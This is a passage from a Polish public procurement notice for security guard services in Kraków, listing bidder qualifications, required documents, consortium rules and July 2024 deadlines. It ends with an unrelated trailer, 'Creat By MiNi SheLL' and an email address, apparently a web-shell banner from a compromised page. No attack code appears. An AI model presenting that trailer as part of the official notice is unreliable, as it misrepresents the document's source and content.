zasięgiem miasto<br/>Kraków.<br/>1.3. zdolności technicznej lub zawodowej, tj:<br/>a) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wykonywał (lub wykonuje) co najmniej dwie usługi<br/>ochrony osób i mienia, z których każda była lub jest świadczona w budynku użyteczności<br/>publicznej (przez budynek użyteczności publicznej należy rozumieć budynek przeznaczony na<br/>potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty,<br/>szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej,<br/>handlu, gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym,<br/>drogowym, lotniczym, morskim lub wodnym śródlądowym, świadczenia usług pocztowych lub<br/>telekomunikacyjnych oraz inny ogólnodostępny budynek przeznaczony do wykonywania<br/>podobnych funkcji, w tym także budynek biurowy i socjalny), trwające nie krócej niż 12 miesięcy<br/>każda i o wartości co najmniej 700 000 zł brutto każda (w przypadku usług nadal wykonywanych<br/>do limitów dotyczących okresu i wartości włącza się wyłącznie usługi już wykonane) obejmujące<br/>obsługę systemu monitoringu i centralki p.poż, w tym co najmniej jedna usługa<br/>dotyczyła/dotyczy ochrony dzieł sztuki (np. galerie sztuki, muzea).<br/>b) dysponują osobami, które będą wykonywać usługę posiadają doświadczenie oraz niezbędne<br/>kwalifikacje, w tym:<br/>i) 1 osobą, która będzie pełnić funkcję koordynatora ochrony, która musi posiadać wymagane<br/>uprawnienia tj.: aktualne zaświadczenie o wpisie na listę kwalifikowanych pracowników ochrony<br/>fizycznej lub kwalifikowanych pracowników zabezpieczenia technicznego wydane przez<br/>właściwy organ na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia,<br/>aktualne zaświadczenie o niekaralności, aktualne badania lekarskie oraz co najmniej 3- letnie<br/>doświadczenie w koordynowaniu grupą pracowników ochrony, w tym w koordynowaniu w ww.<br/>okresie grupą co najmniej 4 pracowników ochrony przy świadczeniu usługi w zakresie ochrony<br/>dzieł sztuki (np. w galeriach, muzeach);<br/>ii) osobami (co najmniej 12 osób) wykonującymi usługę, które muszą posiadać zaświadczenie o<br/>wpisie na listę kwalifikowanych pracowników ochrony fizycznej lub kwalifikowanych pracowników<br/>zabezpieczenia technicznego wydane przez właściwy organ na podstawie ustawy z dnia 22<br/>sierpnia 1997 r. o ochronie osób i mienia, aktualne zaświadczenie o niekaralności, aktualne badania lekarskie oraz co<br/>najmniej 3 - letnie doświadczenie zawodowe w pełnieniu funkcji<br/>pracownika ochrony. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o aktualności informacji zawartych w oświadczeniu/-ach, o którym/-ch mowa w pkt<br/>6.1.5.1. SWZ w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w<br/>pkt 5.2. SWZ odpowiednio: a) samego Wykonawcy lub każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, b) podmiotu/-ów, na którego/-ych zdolnościach technicznych lub zawodowych polega Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu – jeżeli dotyczy, sporządzone wg. wzoru w Załączniku nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. aktualna koncesja Ministerstwa Spraw Wewnętrznych i Administracji na<br/>prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia, wydanej na podstawie<br/>ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia - na potwierdzenie spełniania warunku posiadania doświadczenia, o<br/>którym mowa w pkt 5.1.1. SWZ.;<br/>2. kopia pozwolenia radiowego Prezesa Urzędu Komunikacji Elektronicznej na używanie radiowych urządzeń nadawczych lub<br/>nadawczo – odbiorczych pracjących w służbie radiokomunikacji lądowej lub typu dyspozytorskiego, obejmujące<br/>swym zasięgiem miasto Kraków”<br/>3. Wykaz usług wykonanych lub wykonywanych, w okresie ostatnich 3<br/>lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi<br/>zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, lub są wykonywane, a jeżeli Wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń<br/>nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wystawione w okresie<br/>ostatnich 3 miesięcy- oświadczenie Wykonawcy, na potwierdzenie spełniania warunku posiadania doświadczenia, o którym mowa w<br/>pkt 5.1.3 lit. a) SWZ.;<br/>4. Wykaz osób które będą wykonywały zamówienie wg wzoru stanowiącego Zał. nr 4 do SWZ - na potwierdzenie spełniania<br/>warunku, o którym mowa w pkt 5.1.3. lit. b) SWZ;<br/>Uwaga! Wykonawca, zgodnie z art. 127 ust. 2 ustawy, nie jest zobowiązany do złożenia<br/>podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca (aktywnie)<br/>wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz Oferty, według wzoru stanowiącego Zał. nr 1 do SWZ, wypełniony i podpisany<br/>przez osoby umocowane należycie do reprezentowania Wykonawcy. 2. Wraz z ofertą<br/>Wykonawca składa:1) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej<br/>Ewidencji Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba że<br/>Wykonawca w Formularzu Oferty wskaże dane umożliwiające dostęp do tych dokumentów<br/>samodzielnie przez Zamawiającego, poprzez bezpłatne i ogólnodostępne bazy danych; 2)<br/>pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy, jeżeli w jego imieniu działa osoba, której umocowanie do reprezentowania nie<br/>wynika z dokumentów wymienionych w pkt 1) powyżej; Opisane powyżej zasady stosuje się<br/>odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o<br/>udzielenie niniejszego zamówienia oraz do osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby.3) Zobowiązanie podmiotu udostępniającego zasoby do oddania do<br/>dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia, lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów, jako dowód polegania na zdolnościach<br/>technicznych lub zawodowych tego podmiotu, w odniesieniu do warunków udziału w<br/>postępowaniu, o których mowa w pkt. 5.1. SWZ – jeżeli dotyczy4) Oświadczenie, z którego<br/>wynika, które usługi wykonają poszczególni Wykonawcy – przy czym obowiązek ten dotyczy<br/>wyłącznie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 117 ust. 4 ustawy. 5) W celu<br/>wstępnego potwierdzenia, że Wykonawca nie podlega wykluczeniu<br/>oraz spełnia warunki udziału w postępowaniu, zgodnie z art. 125 ust. 1 i ust. 5 ustawy, składa on<br/>odrębne następujące oświadczenia: a) o niepodleganiu wykluczeniu z postępowania oraz b) o<br/>spełnianiu warunków udziału w postępowaniu, odpowiednio: i. samego Wykonawcy lub każdego<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia; ii. podmiotu/-ów, na<br/>którego/-ych zdolnościach technicznych lub zawodowych polega Wykonawca w celu<br/>potwierdzenia spełniania warunków udziału w postępowaniu – jeżeli dotyczy, według wzorów<br/>zaproponowanych odpowiednio w formularzach A, B, C i D zał. nr 2 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. członkowie<br/>konsorcjum, wspólnicy spółki cywilnej), zgodnie z art. 58 ust. 2 ustawy, są zobowiązani<br/>ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich<br/>w postępowaniu i do zawarcia umowy, i przedstawić stosowne dokumenty (pełnomocnictwa) w<br/>składanej ofercie. 2. Ponadto Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego składają: 2.1. każdy z osobna dotyczące ich dokumenty wskazane odpowiednio w<br/>pkt 6.1.5.1., a ponadto – na wezwanie Zamawiającego – także dokument opisany w pkt 6.2.1<br/>SWZ dot. każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 2.2.<br/>jeżeli dotyczy - dokumenty wskazane w pkt 6.1.3., 6.1.4., 6.1.5.1 dot. podmiotu<br/>udostępniającego zasoby, a ponadto – na wezwanie Zamawiającego – także 6.2.1. SWZ dot.<br/>podmiotu udostępniającego zasoby;2.3. dokumenty, o których mowa w pkt 6.1.1. i 6.1.2. SWZ (w<br/>tym dot. podmiotu udostępniającego zasoby – jeżeli dotyczy); 2.4. ci z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, którzy spełniają warunek udziału w postępowaniu, a<br/>także ewentualnie podmioty udostępniające zasoby - dokumenty, o których mowa w pkt 6.1.5.2<br/>SWZ; 2.5. a na wezwanie Zamawiającego, ci z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, którzy spełniają warunek, na potwierdzenie którego wymagany jest dany<br/>dokument, także dokument wskazany w pkt 6.2.2. – 6.2.5. SWZ. 3. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia (np. członkowie konsorcjum) ponoszą, zgodnie z art.<br/>445 ust. 1 ustawy, solidarną odpowiedzialność za wykonanie umowy i wniesienie<br/>zabezpieczenia należytego wykonania umowy – jeżeli dotyczy. 4. Wykonawcy ubiegający się<br/>wspólnie o udzielenie zamówienia składają oświadczenie, z którego wynika, które usługi<br/>wykonają poszczególni Wykonawcy – przy czym obowiązek ten dotyczy wyłącznie<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 117 ust. 4<br/>ustawy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z treścią wzoru umowy zał. nr 5 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-22 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. W niniejszym postępowaniu komunikacja odbywa się przy użyciu Platformy e-Zamówienia oraz - w zakresie dopuszczonym SWZ także - poczty elektronicznej. Szczegóły dotyczące sposobu porozumiewania się Zamawiającego i Wykonawców zostały określone w pkt 9 SWZ. Adres poczty elektronicznej: zamowienia@nck.krakow.pl.<br/>Adres strony internetowej prowadzonego postępowania, na której udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia: https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-679fb4a2-d5bc-416f-86c6-afc57915f7bc<br/>2. Wykaz oświadczeń lub dokumentów wymaganych w postępowaniu został określony w pkt 6 SWZ.<br/>3. Dodatkowa informacja do sekcji III pkt. 3.6. ogłoszenia:<br/>3.1. W zakresie nieuregulowanym ustawą lub SWZ do podmiotowych środków dowodowych, oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia przywołanego w pkt 8.9. SWZ.<br/>3.2. Formaty danych wymagane do sporządzania i przekazywania dokumentów i informacji w postępowaniu określa § 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie. Zamawiający wskazuje jednak, że wśród dopuszczalnych i ogólnie dostępnych formatów znajdują się m.in.: .txt, .rtf, .pdf, .doc, .docx, .odt.

Creat By MiNi SheLL
Email: jattceo@gmail.com